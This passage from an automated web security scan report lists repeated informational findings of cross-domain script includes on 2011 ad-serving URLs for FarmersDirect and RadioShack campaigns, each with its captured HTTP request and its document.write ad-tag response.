document.write (' SRC="http://ad.doubleclick.net/adj/N3740.270604.B3/B5112048;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/431885630/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=431885630?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.93. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:53 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3440
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbM
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3740.270604.B3/B5112048;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/902448725/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=902448725?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.94. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2843
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2845525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3740.270604.B3/B5112048;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/1170390917/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=1170390917?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.95. http://b3.mookie1.com/3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/11115010667@x90?http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/a3mNQC36UY5sbbTGFbWGMhSPvwTWYSWrr12UepUqrqVEMcQEBZbSGfZcPritPW7aUcYU5FmxmtirYaqv2WQCPGrZc5AJImdANTdQ70bv61b791EysPbQHTFBYWtUYmFZbxPUfMYqMs4a7k2afYnE7E1Ff7TdZbSoAfws2129P/2401206/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226131

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:37:41 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3440
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5112048;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbM
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3740.270604.B3/B5112048;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://a.tribalfusion.com/h.click/aQmNQCR6fK2WFm0tZbInH2x46MQ4GnaVcBcVVJfPP3OUtnTUbMX3raqWqvtTEJdSaMZdRVBCPb6pSWMcWcQR5F6vnWqm0qmn2WbFSGbC2AnHpHPtVWJ7YrfaXUFj0TeMRbUZcUbvYWHM3orYmQFfo1qvq4qbl2a7fs21jlE/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/FarmersDirect/2011Q1/A_TX/300/L44/542234199/x90/USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300/FarmersDirect_2011Q1.html/72634857383030695a694d41416f6366?;ord=542234199?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.96. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:14:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3318
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQ
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1711169344/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1711169344?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.97. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=914803576615380; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; session=1296224086|1296226131; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; other_20110126=set; OAX=rcHW800iZiMAAocf; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; Dominos=DataXuB3;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:44:24 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2694
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/502439571/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=502439571?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.98. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90 HTTP/1.1
Host: b3.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; RMFL=011Pi745U102Og|U106t6; dlx_7d=set; dlx_XXX=set; other_20110126=set; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; dlx_20100929=set; id=914803576615380; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; session=1296256112|1296264723; OAX=rcHW800iZiMAAocf; Dominos=DataXuB3; ATTWL=CollectiveB3;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 05:20:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2703
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e2d45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/1827068337/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1827068337?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.99. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11094578927@x90?http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:37:34 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3318
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e5545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQ
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/aWmN7EXWUAndTy46vR5Vj9UcrbVVriPPrOTHYVWrbX3bisWajnVEn9QTULQGQKQFAqPtniWGv35rXtoWysYqev2HMASGJZa4PUZamdAyTWfeYrf91FF90qipPbQBUbvXVHJ5mF3mQFjnXa3y3EJg4TQQnajFXrJfWE79xdc4wS/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/2075144341/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=2075144341?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.100. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 16:37:39 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3321
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZa
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.10;abr=!ie;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/L44/374200294/x90/USNetwork/RS_SELL_2011Q1_TF_CT_728/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=374200294?">
\n');
document.write ('</SCRIPT>
...[SNIP]...

18.101. http://b3.mookie1.com/3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /3/TribalFusionB3/RadioShack/SELL_2011Q1/CT/728/11114977354@x90?http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZaRbunStY7Ucr54UunnWypYquM3WbFPGJZa5AJZcoWEyTtQ9Yrb61Uj70TqtRrnZbUFnXWdU2orBmRbfmYTvn5EUc4TYYnTnHYr7bUtMXyprwxq6uMx/ HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://a.tribalfusion.com/p.media/aemNYDXa6MRbBDTUvXVWJ4nrjpQbMm1EZbt4a7l2av5mEJBYbU7UWFTmAMZdpV7optQE5q373deq4mnKmrrKYsfPXcvV1svunab43rFTWUMAUAUVPqb1QsrMQdbN0dbpT6ru4G31XFnZcT6iu46r9Q6nF2Wvp0dBAMTAJxq6YRw/2401306/adTag.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_o4efm_qppm_iuuq=ffffffff09419e2b45525d5f4f58455e445a4a423660; other_20110126=set; dlx_XXX=set; dlx_20100929=set; session=1296224086|1296226119

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:48:49 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3321
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.10;sz=728x90;click0=http://a.tribalfusion.com/h.click/a0mNYDpdIo56JW4sU7TGJaVcBgS6ZbyWdZbVTFJ15bErWaYmVEJdQEvJSVFZa
...[SNIP]...
RGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
